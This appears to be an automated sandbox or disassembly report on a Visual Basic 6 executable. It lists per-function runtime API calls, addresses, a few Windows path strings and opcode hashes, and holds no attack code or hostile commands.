__vbaChkstk.MSVBVM60(?,004025E6), ref: 0040E85E
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040E8A3
__vbaStrCopy.MSVBVM60(?,?,?,?,004025E6), ref: 0040E8B8
#712.MSVBVM60(?,file:///,00406674,00000001,000000FF,00000000,?,?,?,?,004025E6), ref: 0040E8D9
__vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E8E4
#712.MSVBVM60(?,00407218,004055FC,00000001,000000FF,00000000,?,?,?,?,004025E6), ref: 0040E905
__vbaStrMove.MSVBVM60(?,?,?,?,004025E6), ref: 0040E910
#572.MSVBVM60(00004002), ref: 0040E969
__vbaStrMove.MSVBVM60 ref: 0040E974
#537.MSVBVM60(00000020), ref: 0040E97F
__vbaStrMove.MSVBVM60 ref: 0040E98A
__vbaStrMove.MSVBVM60(00000001,000000FF,00000001), ref: 0040E9B6
__vbaStrMove.MSVBVM60(00407220,00000000), ref: 0040E9C8
__vbaStrCat.MSVBVM60(00000000), ref: 0040E9CF
__vbaStrMove.MSVBVM60 ref: 0040E9DA
#712.MSVBVM60(?,00000000), ref: 0040E9E5
__vbaStrMove.MSVBVM60 ref: 0040E9F0
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,00000000,00000000), ref: 0040EA0C
__vbaStrCopy.MSVBVM60 ref: 0040EA2E
__vbaFreeStr.MSVBVM60(0040EA78), ref: 0040EA71
__vbaErrorOverflow.MSVBVM60 ref: 0040EAA2

Strings

file:///, xrefs: 0040E8D0
, xrefs: 0040E929

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Move$#712$CopyErrorFree$#537#572ChkstkListOverflow
String ID: $file:///
API String ID: 1913684286-1087255347
Opcode ID: 471baceb6f3394a0abeda471f643fca34b39d10fb75ad6f9a39b5992f0af1d91
Instruction ID: 6c3c390ee14800d438280c46509e4d6c9a5a921f8fc3fa6165506003015d033a
Opcode Fuzzy Hash: 471baceb6f3394a0abeda471f643fca34b39d10fb75ad6f9a39b5992f0af1d91
Instruction Fuzzy Hash: 6551FA71900208EBDB04DFE4DE48BDEBBB4FF08714F208229E612BB2A4DB755A45CB54

Function 0040C843 Relevance: 39.4, APIs: 26, Instructions: 364COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C884
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,0000004C), ref: 0040C8B7
__vbaFreeObj.MSVBVM60 ref: 0040C8EF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000728), ref: 0040C94E
__vbaChkstk.MSVBVM60(?), ref: 0040C984
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040563C,00000020), ref: 0040C9C8
__vbaObjSet.MSVBVM60(?,?), ref: 0040C9FB
__vbaErrorOverflow.MSVBVM60 ref: 0040CC42
__vbaOnError.MSVBVM60(00000001), ref: 0040CC8C
__vbaNew2.MSVBVM60(004055D8,0041B8D8), ref: 0040CCA4
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040CCC7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,00000040), ref: 0040CCEB
__vbaObjSet.MSVBVM60(?,?), ref: 0040CD02
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,004055C8,0000000C), ref: 0040CD18
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040CD28
__vbaExitProc.MSVBVM60 ref: 0040CD31

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$CheckHresult$ErrorFree$ChkstkExitListNew2OverflowProc
String ID:
API String ID: 435708370-0
Opcode ID: 0fb701564dfaea06c5895f1466d9b178208b09d8fd869f579df3c1af8609f287
Instruction ID: a4ec598c1f86ad3a10f33067e1d5db8d23c0cfab8629dd77bc108e4b9737f716
Opcode Fuzzy Hash: 0fb701564dfaea06c5895f1466d9b178208b09d8fd869f579df3c1af8609f287
Instruction Fuzzy Hash: EDE11775900208EFDB14DFA4C988ADEBBB5FF48700F208269F509B7291D7759985CF64

Function 00418C90 Relevance: 36.9, APIs: 20, Strings: 1, Instructions: 103COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409F3C,80000002,00000000), ref: 00418CAE
__vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CDB
__vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CE7
__vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CF3
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00418D02
__vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6), ref: 00418D1B
__vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004025E6), ref: 00418D2B
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D39
__vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418D42
__vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418D53
__vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004025E6), ref: 00418D62
__vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004025E6), ref: 00418D75
__vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004025E6), ref: 00418D85
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D93
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418DA1
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004025E6), ref: 00418DB1
__vbaSetSystemError.MSVBVM60(?,?,00000000,004025E6), ref: 00418DCA
__vbaFreeStr.MSVBVM60(00418E07,?,00000000,004025E6), ref: 00418DEE
__vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418DF7
__vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418E00

Strings

`%@, xrefs: 00418CED

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Free$Error$AnsiCopySystemUnicode$BstrChkstkList
String ID: `%@
API String ID: 653519621-700023621
Opcode ID: 47785f7da99cc1d885bec86910e85175bc0604dc897027ecb10ac562a20b6aef
Instruction ID: 012eab173ab8f044d01c72bc6db05120050b8ff049b8a372a5089938a40e6a64
Opcode Fuzzy Hash: 47785f7da99cc1d885bec86910e85175bc0604dc897027ecb10ac562a20b6aef
Instruction Fuzzy Hash: 5E41DA76900209EBCB04EFE4DE59EDEBB78FB48305F108519F216B71A0DB75AA44CB64

Function 004123C0 Relevance: 34.6, APIs: 23, Instructions: 111COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,?,?,?,00000000,004025E6), ref: 004123DE
__vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 0041240B
__vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 0041241A
#648.MSVBVM60(0000000A), ref: 00412439
__vbaFreeVar.MSVBVM60 ref: 00412448
__vbaI2I4.MSVBVM60(?), ref: 0041245C
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041246A
__vbaI2I4.MSVBVM60 ref: 0041247A
#570.MSVBVM60(00000000), ref: 00412481
__vbaLenBstr.MSVBVM60(00404B24), ref: 0041248E
__vbaLenBstr.MSVBVM60(00404B24), ref: 004124C1
#525.MSVBVM60(00000000), ref: 004124C8
__vbaStrMove.MSVBVM60 ref: 004124D3
__vbaI2I4.MSVBVM60 ref: 004124E3
__vbaFileSeek.MSVBVM60(00000004,00000000), ref: 004124EE
__vbaI2I4.MSVBVM60 ref: 004124FE
__vbaGet3.MSVBVM60(00000000,?,00000000), ref: 0041250B

Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3

__vbaStrMove.MSVBVM60(?), ref: 00412526
__vbaI2I4.MSVBVM60 ref: 00412536
__vbaFileClose.MSVBVM60(00000000), ref: 0041253D
__vbaFreeStr.MSVBVM60(0041257A), ref: 0041256A
__vbaFreeStr.MSVBVM60 ref: 00412573
__vbaErrorOverflow.MSVBVM60 ref: 00412590

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Free$Move$BstrFile$#516#631Error$#525#570#648ChkstkCloseCopyGet3OpenOverflowSeek
String ID:
API String ID: 2204187013-0
Opcode ID: aee74aa748bdbe5f43d680c2071f8268772085965dd0da7e2e4a6c12403588e9
Instruction ID: 9955b3bf1519d9cbb4ebd4c64d53d5ed1380afe2e3f12c5c860cc2a089516978
Opcode Fuzzy Hash: aee74aa748bdbe5f43d680c2071f8268772085965dd0da7e2e4a6c12403588e9
Instruction Fuzzy Hash: F341E971D00248EBDB04DFA4DB5DBDEBBB5AB48305F208129E512B76A0DB785A44CB58

Function 004161B0 Relevance: 31.7, APIs: 21, Instructions: 182COMMON

Download Yara Rule

APIs

__vbaAryConstruct2.MSVBVM60(?,004075E8,00000011,00000000,6CFB285F,6CFA1654), ref: 00416207
__vbaSetSystemError.MSVBVM60(00000000,?,00000040,?,00000000), ref: 00416231
__vbaSetSystemError.MSVBVM60(?,?,00000002), ref: 00416242
#537.MSVBVM60(00000000), ref: 00416252
__vbaStrMove.MSVBVM60 ref: 0041625F
#537.MSVBVM60(?,00000000), ref: 0041626B
__vbaStrMove.MSVBVM60 ref: 00416272
__vbaStrCat.MSVBVM60(00000000), ref: 00416275
__vbaStrMove.MSVBVM60 ref: 00416280
__vbaStrCmp.MSVBVM60(004075CC,00000000), ref: 00416288
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004162A5
__vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 004162D9
__vbaSetSystemError.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 004162EF
#537.MSVBVM60(?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416300
__vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416307
__vbaStrCmp.MSVBVM60(004075E0,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041630F
#537.MSVBVM60(00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416326
__vbaStrMove.MSVBVM60(?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041632D
__vbaStrCmp.MSVBVM60(004075D8,00000000,?,?,00000004,?,00000000,?,?,?,00000000), ref: 00416335
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,00000004,?,00000000,?,?,?,00000000), ref: 0041636D
__vbaAryDestruct.MSVBVM60(00000000,?,004163C6), ref: 004163BF

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Move$#537ErrorSystem$FreeList$Construct2Destruct
String ID:
API String ID: 2170920009-0
Opcode ID: 6ebc35bea6a8f601c4351b039a5634e8cf150fa43bae1ceb42ad26cebf419b59
Instruction ID: 748b6d861cac5db048dabb3adba27979951a1416e05c768a4f54423434dde149
Opcode Fuzzy Hash: 6ebc35bea6a8f601c4351b039a5634e8cf150fa43bae1ceb42ad26cebf419b59
Instruction Fuzzy Hash: 99518371A00219ABDB14DBB4CD45FEEBBB9EF48700F11812AE946F7291DA745D04CB94

Function 0040E340 Relevance: 31.7, APIs: 21, Instructions: 166COMMON

Download Yara Rule

APIs

__vbaOnError.MSVBVM60(00000001), ref: 0040E391
__vbaCastObj.MSVBVM60(00000000,004071DC), ref: 0040E39F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E3AA
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4), ref: 0040E3D0
__vbaFreeObj.MSVBVM60 ref: 0040E3DD
__vbaCastObj.MSVBVM60(00000000,004071DC), ref: 0040E3F0
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E3FB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007C4), ref: 0040E41B
__vbaFreeObj.MSVBVM60 ref: 0040E420
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007BC), ref: 0040E445
__vbaHresultCheckObj.MSVBVM60(00000000,?,004071EC,00000078), ref: 0040E465
__vbaStrCopy.MSVBVM60 ref: 0040E46D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00407144,000007B0), ref: 0040E494
#519.MSVBVM60(?), ref: 0040E49A
__vbaStrMove.MSVBVM60 ref: 0040E4A5
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040E4B9
__vbaFreeObj.MSVBVM60 ref: 0040E4C5
__vbaLenBstr.MSVBVM60(?), ref: 0040E4CF
__vbaRaiseEvent.MSVBVM60(?,00000001,00000001), ref: 0040E4FC
__vbaExitProc.MSVBVM60 ref: 0040E50E
__vbaFreeStr.MSVBVM60(0040E546), ref: 0040E53F

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$CheckFreeHresult$Cast$#519BstrCopyErrorEventExitListMoveProcRaise
String ID:
API String ID: 2502233557-0
Opcode ID: 7be39dfed923fa2b8522099cfc5c1e781b78136ccb618d12821b1d76752c5173
Instruction ID: 2210176cfa9892e4a02b66722b5e7dfe915d6efbf244aeeba38d0bb5bf168e27
Opcode Fuzzy Hash: 7be39dfed923fa2b8522099cfc5c1e781b78136ccb618d12821b1d76752c5173
Instruction Fuzzy Hash: 3D514BB1901208ABDB00DFA5DD48EEEBBB8FF48704F10856AF505B72A0D774A945CF68

Function 00410B60 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 84COMMON

Download Yara Rule

APIs

#712.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BAC
__vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BB9
#712.MSVBVM60(?,\\?\,00406674,00000001,000000FF,00000000,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410BCE
__vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BD5
#712.MSVBVM60(?,\SystemRoot\,00000000,00000001,000000FF,00000001,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410BEC
__vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410BF3
#712.MSVBVM60(?,%systemroot%,00000000,00000001,000000FF,00000001,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410C0B
__vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C12
#712.MSVBVM60(?,00407458,004055FC,00000001,000000FF,00000000,?,\??\,00406674,00000001,000000FF,00000000), ref: 00410C27
__vbaStrMove.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C2E
__vbaStrCopy.MSVBVM60(?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C36
__vbaFreeStr.MSVBVM60(00410C57,?,\??\,00406674,00000001,000000FF,00000000,?,?,?,?,00000000,004025E6,00000000), ref: 00410C50

Strings

\??\, xrefs: 00410BA0
%systemroot%, xrefs: 00410C05
\SystemRoot\, xrefs: 00410BE6
\\?\, xrefs: 00410BC8

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$#712Move$CopyFree
String ID: %systemroot%$\??\$\SystemRoot\$\\?\
API String ID: 2546659950-1311169778
Opcode ID: 8b5b65525cf323457cd06075d39e7c1bde9f6f91a6c07b5f569d8b5f78ef97a4
Instruction ID: 3cf452ae6fb0dfcbcd02110e459b44aaa686f69a821e3f1c8313cc58adc2f9c6
Opcode Fuzzy Hash: 8b5b65525cf323457cd06075d39e7c1bde9f6f91a6c07b5f569d8b5f78ef97a4
Instruction Fuzzy Hash: 8F214B70A54209BBCB04EB54CC82FEFBB79AB54710F204327B611B72D4DEB45945CAD4

Function 00418B50 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
__vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
__vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
__vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
__vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
__vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
__vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
__vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
__vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
__vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
__vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
__vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75

Strings

(%@, xrefs: 00418C05, 00418C08

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$ErrorFree$System$AnsiCopyUnicode$Chkstk
String ID: (%@
API String ID: 3031735744-1462787901
Opcode ID: 566f84c16e9852cbe43a341eb0fc3600b6bd4deadf9746a13e5076369c76cc33
Instruction ID: 2163017d223cc4516af4853558ee8a19d87b4fb9e6127d64d5f8f75e22c004d5
Opcode Fuzzy Hash: 566f84c16e9852cbe43a341eb0fc3600b6bd4deadf9746a13e5076369c76cc33
Instruction Fuzzy Hash: C731FBB5800209ABCB04DFE4DE59FDE7B78FB48714F108569F211B72A0D7746A48CB68

Function 0040FDD0 Relevance: 27.1, APIs: 18, Instructions: 122COMMON

Download Yara Rule

APIs

__vbaStrCat.MSVBVM60(00401D48,004072B8,?,00000001), ref: 0040FE20
__vbaStrMove.MSVBVM60 ref: 0040FE2D
__vbaStrCat.MSVBVM60(004072C0,00000000), ref: 0040FE35
__vbaStrMove.MSVBVM60 ref: 0040FE3C
__vbaInStr.MSVBVM60(00000000,00000000), ref: 0040FE40
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040FE52
__vbaStrCat.MSVBVM60(00401D48,00407390,?,-00000001), ref: 0040FE80
__vbaStrMove.MSVBVM60(?,-00000001), ref: 0040FE87
__vbaStrCat.MSVBVM60(004072C0,00000000,?,-00000001), ref: 0040FE8F
__vbaStrMove.MSVBVM60(?,-00000001), ref: 0040FE96
__vbaInStr.MSVBVM60(00000000,00000000,?,-00000001), ref: 0040FE9B
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,-00000001), ref: 0040FEAD
__vbaLenBstr.MSVBVM60 ref: 0040FEC0
__vbaLenBstr.MSVBVM60(?,?), ref: 0040FEF3
#631.MSVBVM60(?,-00000002,?,?), ref: 0040FF09
__vbaStrMove.MSVBVM60(?,-00000002,?,?), ref: 0040FF14
__vbaFreeVar.MSVBVM60(?,-00000002,?,?), ref: 0040FF19
__vbaErrorOverflow.MSVBVM60 ref: 0040FF69

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Move$Free$BstrList$#631ErrorOverflow
String ID:
API String ID: 43011225-0
Opcode ID: 885353d30146d4874439d9188de8ce179380beda0541da3dfd58a4a737dd6ec3
Instruction ID: f3b2892753be04fed0370ccfbe7307407226e01e24b32ae3149310476cb42e92
Opcode Fuzzy Hash: 885353d30146d4874439d9188de8ce179380beda0541da3dfd58a4a737dd6ec3
Instruction Fuzzy Hash: C7417475A00209AFD714DFA4CD85E9E7B79FB89700F10413BF901B76A0DA74A948CBA4

Function 00410FB0 Relevance: 27.1, APIs: 18, Instructions: 106COMMON

Download Yara Rule

APIs

__vbaRecUniToAnsi.MSVBVM60(00404BAC,?,?), ref: 0041103F
__vbaSetSystemError.MSVBVM60(00000000), ref: 0041104B
__vbaRecAnsiToUni.MSVBVM60(00404BAC,00000094,?), ref: 00411064
__vbaStrI4.MSVBVM60(?), ref: 00411077
__vbaStrMove.MSVBVM60 ref: 00411087
__vbaStrCat.MSVBVM60(004057CC,00000000), ref: 00411095
__vbaStrMove.MSVBVM60 ref: 0041109F
__vbaStrI4.MSVBVM60(?,00000000), ref: 004110A9
__vbaStrMove.MSVBVM60 ref: 004110B3
__vbaStrCat.MSVBVM60(00000000), ref: 004110B6
__vbaStrMove.MSVBVM60 ref: 004110C0
__vbaStrCat.MSVBVM60(004057CC,00000000), ref: 004110C8
__vbaStrMove.MSVBVM60 ref: 004110D2
__vbaStrI4.MSVBVM60(?,00000000), ref: 004110DC
__vbaStrMove.MSVBVM60 ref: 004110E6
__vbaStrCat.MSVBVM60(00000000), ref: 004110E9
__vbaStrMove.MSVBVM60 ref: 004110F3
__vbaFreeStrList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 00411121

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Move$Ansi$ErrorFreeListSystem
String ID:
API String ID: 669208520-0
Opcode ID: 15d97e58667047e38884c40753fbc310222c58e867efe20913db211b95d16ab2
Instruction ID: 84428951c38bdac4841b214fd1cb50a500f43101e76cc919ffdd761ca84df74b
Opcode Fuzzy Hash: 15d97e58667047e38884c40753fbc310222c58e867efe20913db211b95d16ab2
Instruction Fuzzy Hash: AD410EB1D00218ABCB65EB65CD44BEABBB9EF48700F1041EAE509B3160DE746F85CF94

Function 00418F30 Relevance: 25.7, APIs: 17, Instructions: 169COMMON

Download Yara Rule

APIs

__vbaGenerateBoundsError.MSVBVM60(6CF84F32,00000000,00000FEE), ref: 00418FAE
__vbaGenerateBoundsError.MSVBVM60(6CF84F32,00000000,00000FEE), ref: 00418FC2
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,00000000,00000000), ref: 00418FE9
__vbaAryLock.MSVBVM60(?,00000000), ref: 00419003
__vbaGenerateBoundsError.MSVBVM60 ref: 0041901E
__vbaGenerateBoundsError.MSVBVM60 ref: 00419022
__vbaAryLock.MSVBVM60(?,?), ref: 0041902E
__vbaGenerateBoundsError.MSVBVM60 ref: 00419049
__vbaGenerateBoundsError.MSVBVM60 ref: 00419052
__vbaSetSystemError.MSVBVM60(00000000,00000000,-00000001), ref: 0041907B
__vbaAryUnlock.MSVBVM60(?), ref: 0041908B
__vbaAryUnlock.MSVBVM60(?), ref: 00419091
__vbaPutOwner3.MSVBVM60(00407524,?,00000000), ref: 004190A4
__vbaGenerateBoundsError.MSVBVM60(6CF84F32,00000000,00000FEE), ref: 004190D1
__vbaGenerateBoundsError.MSVBVM60(6CF84F32,00000000,00000FEE), ref: 004190E1
__vbaAryDestruct.MSVBVM60(00000000,?,0041912C), ref: 00419125
__vbaErrorOverflow.MSVBVM60(6CF84F32,00000000,00000FEE), ref: 0041913F

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
